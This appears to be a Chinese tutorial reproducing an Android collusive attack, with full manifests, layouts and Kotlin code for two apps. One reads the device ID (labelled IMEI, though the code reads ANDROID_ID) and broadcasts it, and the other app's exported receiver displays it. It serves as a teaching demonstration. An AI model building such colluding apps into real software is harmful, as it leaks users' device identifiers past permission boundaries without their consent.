引入
Collusive_Attack复现,即合谋攻击复现,简单来讲即appA获取权限和相关信息,appB接收或转发相应敏感信息
参考代码
有权app
androidmanifest.xml
1
| <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
|
main_activity.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| <?xml version="1.0" encoding="utf-8"?>
<LinearLayout
xmlns:android="http://schemas.android.com/apk/res/android"
android:orientation="vertical"
android:gravity="center"
android:layout_width="match_parent"
android:layout_height="match_parent">
<Button
android:id="@+id/btnSend"
android:text="读取IMEI并发送"
android:layout_width="wrap_content"
android:layout_height="wrap_content"/>
</LinearLayout>
|
MainActivity.kt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| package com.example.mobile_demo2
import android.content.ComponentName
import android.content.Intent
import android.os.Bundle
import android.provider.Settings
import android.widget.Button
import androidx.appcompat.app.AppCompatActivity
class MainActivity : AppCompatActivity() {
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
val btn = findViewById<Button>(R.id.btnSend)
btn.setOnClickListener {
val deviceId = Settings.Secure.getString(
contentResolver,
Settings.Secure.ANDROID_ID
)
val intent = Intent()
intent.putExtra("imei", deviceId)
intent.component = ComponentName(
"com.example.mobile_demo3",
"com.example.mobile_demo3.MyReceiver"
)
sendBroadcast(intent)
}
}
}
|
接收app
androidmanifest.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| <?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools">
<application
android:allowBackup="true"
android:dataExtractionRules="@xml/data_extraction_rules"
android:fullBackupContent="@xml/backup_rules"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true"
android:theme="@style/Theme.Mobile_demo3"
tools:targetApi="31">
<activity
android:name=".MyReceiver"
android:exported="false"
tools:ignore="Instantiatable" />
<activity
android:name=".MainActivity"
android:exported="true">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<receiver
android:name=".MyReceiver"
android:exported="true" />
</application>
</manifest>
|
main_activity.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| <?xml version="1.0" encoding="utf-8"?>
<LinearLayout
xmlns:android="http://schemas.android.com/apk/res/android"
android:orientation="vertical"
android:gravity="center"
android:layout_width="match_parent"
android:layout_height="match_parent">
<TextView
android:id="@+id/txtData"
android:text="等待数据..."
android:textSize="22sp"
android:layout_width="wrap_content"
android:layout_height="wrap_content"/>
</LinearLayout>
|
Main_Activity.kt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| package com.example.mobile_demo3
import android.os.Bundle
import android.widget.TextView
import androidx.appcompat.app.AppCompatActivity
class MainActivity : AppCompatActivity() {
companion object {
var textView: TextView? = null
}
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
textView = findViewById(R.id.txtData)
}
}
|
MyReceiver.kt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| package com.example.mobile_demo3
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
class MyReceiver : BroadcastReceiver() {
override fun onReceive(context: Context?, intent: Intent?) {
val imei = intent?.getStringExtra("imei")
MainActivity.textView?.text = "收到IMEI: $imei"
}
}
|